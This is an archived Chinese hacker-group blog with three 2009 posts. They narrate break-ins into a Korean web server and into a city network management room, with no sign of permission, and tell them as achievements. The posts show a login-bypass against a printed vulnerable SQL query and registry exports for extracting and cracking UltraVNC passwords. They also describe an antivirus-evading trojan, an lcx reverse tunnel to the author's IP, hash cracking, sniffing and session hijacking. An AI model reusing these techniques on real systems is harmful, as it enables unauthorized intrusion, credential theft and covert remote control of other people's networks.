存档

‘渗透测试’ 分类的存档

渗透韩国服务器到配置Win2000单网卡VPN

2009年10月24日 1 条评论

来   源:http://www.007hack.com/?p=130

作  者:007安全小组–不走的钟

       遇到一韩国高速服务器,速度快得让我实在舍不得离开, PHP网站但没有注入,服务器就一个站,不过幸运找到了网站后台,弱口令登陆不成功,然后又回到前台,偌大一个网站我就不信找不到一个注入点,手动加工具还是徒劳,前台不行又回到后台,经过十多分钟的构造终于弄了一个万能密码,然后进入后台。

      到了后台,虽然语言不通,但还是在我耐心下拿到Webshell,看了后台下源码:

   $sql = “SELECT USERID, PASSWORD FROM USERT WHERE USERID = ‘”.$id.”‘ AND PASSWORD = ‘”.$passwd.”‘”;
   $DB = new DB_class();
   $DB->sql($sql);
   $DB->fetch_row();

   $user_id = $DB->f(‘USERID’);

         看了源码一目了然,不过当时单引号不报错,我折腾了好会儿。从Webshell中收集到的信息,Win 2000+php+mysql,可以调用ws执行命令。

        通过UltraVNC提权我这里不再叙述,有兴趣的去参考昨天的文章

       《UltraVNC 提权–本地密码破解》

 

111

             VPN配置是一个古老的话题,但网上85%的文档都没有写全,很容易误导新手。Win2003双网卡配置VPN很简单,单网卡配置使用NAT一样很简单,可以可视化操作,添加NAT协议,再添加两个接口,一个是本地连接,一个是内部,设置本地连接为全转发就OK。其实Win2000中文版本单双网卡配置VPN也比较简单,使用netsh命令就可以搞定。

         Win2000单网卡配置VPN,选择:

112

下边引用一段文字描述:

右击要配置的服务器->”配置并启用路由和远程访问”。
跳过欢迎页面,在”路由和远程访问服务器安装向导”页面中选择”虚拟专用网络(VPN)服务器”。
下一步,在”远程客户协议”页面根据需要选择合适的协议,这儿选择”TCP/ip”。
下一步,在”internet连接”页面,选择一个用来让远程计算机连接的internet连接。
下一步,在”IP地址指定”页面,选择合适的地址分配方案,为灵活起见选择DHCP好一些.如果仅是几个地址的话可以指定一个地址范围。
下一步,在”管理多个远程访问服务器”页面,选择”不,我现在不想设置此服务器使用RADIUS”。
下一步,完成如下图:

1113

然后使用以下命令:

netsh routing ip nat install //添加nat协议

netsh routing ip nat add interface 本地连接 full //添加nat接口本地连接全转发

netsh routing ip nat add interface 内部 private //添加nat借口内部私有模式

 netsh

         现在的问题来了,“本地连接”几个字可以到“网络连接”重命名时可以复制,但“内部”二个字却怎么都搞不出来,也没有地方可以复制,第一个字长得像LH哈,如下图:

2 拷贝

突然间想到了在线翻译,英文inside,翻译后的结果与上图对比了下,完全一样,兴奋ing!

1

然后把它们分别代替“本地链接”、“内部”执行netsh就OK!

点击它,右键就可以配置IP段和日志是否记录等

115

建立拨入权限用户和客户端配置很简单,就不提了,连接上去可以打开网页,如下图:

116

UltraVNC提权—-本地密码破解

2009年10月23日 1 条评论

来  源:http://www.007hack.com/?p=122

作  者:007安全小组—不走的钟

       UltraVNC是开源的远程终端模拟软件,在国外应用非常广泛。不走的钟在渗透韩国服务器时遇到UltraVNC,网络中只有读取VNC注册表的提权方法,但UltraVNC测试不成功,本地安装UltraVNC测试,发现它的本地密码破解与VNC只是注册表中的密码位置发生了变化。

VNC注册表位置:

regedit -e c:\vnc.txt “HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\”

UltraVNC注册表位置:

regedit -e c:\UltraVNC.txt  “HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3″

C:\>type UltraVNC.txt

 Windows Registry Editor Version 5.00
 
 [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
 ”DebugMode”=dword:00000000
 ”DebugLevel”=dword:00000000
 ”AllowLoopback”=dword:00000000
 ”LoopbackOnly”=dword:00000000
 ”DisableTrayIcon”=dword:00000000
 ”MSLogonRequired”=dword:00000000
 ”NewMSLogon”=dword:00000000
 ”UseDSMPlugin”=dword:00000000
 ”ConnectPriority”=dword:00000000
 ”DSMPlugin”=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,39,a0,6e,79,11,a0,6e,79,20,ff,ba,00,00,00,\
   00,00,00,00,00,00,80,83,13,00,d8,ce,6e,79,00,00,00,00,00,00,00,00,00,00,00,\
   00,30,00,13,00,02,00,00,00,00,00,00,00,22,00,00,00,00,00,13,00,00,00,00,00,\
   00,00,00,00,40,b7,e5,77,1b,00,00,00,00,02,00,00,fc,ff,ba,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,80,54,9a,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,80,83,13,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00
 
 [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
 ”FileTransferEnabled”=dword:00000001
 ”FTUserImpersonation”=dword:00000001
 ”BlankMonitorEnabled”=dword:00000001
 ”CaptureAlphaBlending”=dword:00000000
 ”BlackAlphaBlending”=dword:00000000
 ”DefaultScale”=dword:00000001
 ”UseDSMPlugin”=dword:00000000
 ”DSMPlugin”=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,39,a0,6e,79,11,a0,6e,79,20,ff,ba,00,00,00,\
   00,00,00,00,00,00,80,83,13,00,d8,ce,6e,79,00,00,00,00,00,00,00,00,00,00,00,\
   00,30,00,13,00,02,00,00,00,00,00,00,00,22,00,00,00,00,00,13,00,00,00,00,00,\
   00,00,00,00,40,b7,e5,77,1b,00,00,00,00,02,00,00,fc,ff,ba,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,80,54,9a,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,80,83,13,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00
 ”SocketConnect”=dword:00000001
 ”HTTPConnect”=dword:00000000
 ”XDMCPConnect”=dword:00000000
 ”AutoPortSelect”=dword:00000000
 ”InputsEnabled”=dword:00000001
 ”LocalInputsDisabled”=dword:00000000
 ”IdleTimeout”=dword:00000000
 ”QuerySetting”=dword:00000002
 ”QueryTimeout”=dword:0000000a
 ”QueryAccept”=dword:00000000
 ”LockSetting”=dword:00000000
 ”RemoveWallpaper”=dword:00000001
 ”Password”=hex:5f,1f,74,21,f9,e2,15,e9
 ”AllowShutdown”=dword:00000001
 ”AllowProperties”=dword:00000001
 ”AllowEditClients”=dword:00000001
 ”PortNumber”=dword:00001713
 ”HTTPPortNumber”=dword:000016af

使用vncx4.exe即可破解密文,

passwd.psd

最终顺利拿到服务器权限!

Down:vncx4

误入网络管理机房

2009年9月28日 没有评论
发表于<<黑客X档案>>2007年总第66期

 

作     者:007安全小组成员—不走的钟

时     间:2007年

来     源:http://www.007hack.com/?p=33

 

外的收获:
       最近跨站传得火热,追随潮流,初研跨站攻击,意外地得到某人才招聘网留言板管理员cookie,cookie中有MD5加密后的密码,在http://www.cmd5.com成功解密。运气真是好到了家,利用域名+该密码成功地进入了FTP,上传大写,就这样忽悠到了webshell。服务器中serv-u默认密码虽改,但安装目录有更改权限,简单添加FTP管理员,顺利得到服务器FTP管理员权限,在网站留板中留言: 
1191832221_0_58253100
     那知第二天留言被删,漏洞依在,如此重要的人才招聘网站居然没人理会,便引起了我的好奇之心,想到服务器看看究竟。

 探测WEB服务器
   有了FTP管理员权限轻松拿下了服务器权限图中aa.exe为加工的免杀鸽子

 1191832221_0_56579800
 
 
 

 

3 

 

Ipconfig /all如图4 
 

 

 

 

 

4 

 

 
 
       这里可以看到内网中还一台DNS服务器和wins服务器,因为网站访问非常大,所以作了个wins服务器用于在局域网内缓解网络风暴,后来又发现原来WEB服务器与mssql数据库、mysql服务器是分开的,并且都在内网,看来内网还有戏。由于我是内网,所以在本地路由上把51、3456端口映射到外网,本地执行lcx.exe -listen 51 3456,在鸽子中执行lcx.exe –slave 我的IP 51 127.0.0.1 3389这样用 127.0.0.1:3456来端口转发,成功地用终端能登陆到内网。有VLAN的存在,为了安全和方便先来破解管理员密码,用saminside 抓取hash 再用lc5在肉鸡上跑,第二天就拿到了administrator的密码。具体方法这里我不再赘述。 

5
身陷内网
利用cain的嗅探得到了wins服务器3389登陆密码 

 

6

 

 
 
(图06)这台wins服务器有mysql数据库倒是我意料中的事,翻WEB服务器时就发现了它的存在。让我倍感惊奇的是上边居然装了sshclient,大家都明白sshclient一般是用来管理linux/unix的。那linux/unix 又在那儿?带着疑问断续扩张内网,扫描内网、arp -a查看路由表、收集管理员信息,发现同网段中,还有很多在线的服务器。用lc5破解的密码和上边嗅探到的密码又进去了二台服务器,但其它已知的服务器还是不能进去,用ms06040和DNS程序溢出,结果没一台溢出成功,看来补丁都是打上了。在进去的几台服务器中,除了WEB服务器,其它服务器都有administrator和root3306二个超级用户,用administrator的密码不能登陆root3306,桌面上的文件也不一样,大概估计有二个管理员在管理。想到这时马上再抓hash,在二台肉鸡上同时跑,不到二个小时就出来了结果。
7 

利用这个密码幸运地进了几台服务器,就这样mssql服务器、mysql服务器、nds服务器、wins服务器、另外还有个FTP搜索引擎服务器都在控制之中了(图07): 
 

 

 

 

 

8
 
 
突破内网
激动的时刻终于来临,大家看到没“网强网络管理系统”,这个网络管理系统估计见到的朋友不多。大学时,区网络中心出了故障,我成了老师“助手”前去维护,那次很幸运地见识这套管理系统

 

 9

 

主要功能:自动拓扑发现、故障管理、设备背板、设备实时监控和链路实时监控来分析网络运行,大家注意哟,这个支持手机短信告警。
难得见到这东西,总得进去看看吧,用系统初始状态密码登陆网络管理系统失败,用二个管理员密码也登陆失败,正在无奈之际,用quser 发现这个用户有二个会话,一个当然是我,另一个会话是上次管理员登陆没有注销,立马tscon 1转入到他的会话,哈哈,真是天无绝人之路,网强网络管理系统他断开时没有关闭。就这样参观下这个网络管理系统。如(图10):

 

 

 
10 
 
 

 

这里的资料真是全,拓扑结构图、日志记录、服务器信息、交换设备等信息一切皆在掌握之中。原来这原来是一个域的管理系统机房,人才招聘网只不过是放在这罢了

 

 11

 

Radware linkproof我查资料才知道是价值20万以上的以色列产品,实现负载均衡的。丛网络管理系统中了解到,原来那个SSH就是来管理Radware linkproof的,配制方面估计也是用SSH来实现的。从IP拓扑图中可以看到,整个域的网络结构,

 

 

 
 11
 
 

 

由于不懂linux没有进Radware linkproof 的意向,也害怕一不小心成了破坏,所以就不打它的主意了。用cmd密码记录器轻松弄到交换机密码,cisco6509倒是比较熟悉,可以进去看看。

 

 

 

 
 12
 
 

 

在服务器启动项中写入txt文本,提醒管理员漏洞,随便设置了下serv-u目录的权限。整个渗透过程就此完毕!
回顾:由于人才网站放在城域网网络管理机房,人才网留言板的跨站漏洞,到简单提权到服务器,用暴力破解+嗅探+社会工程学+运气忽悠进内网系统得到拓扑图。告诫大家,千里之堤,溃于蚁穴。安全也要从小做起,本文没有任何技术含量,老鸟勿笑……

 

 

 

 

   

  
分类: 本站原创, 渗透测试 标签: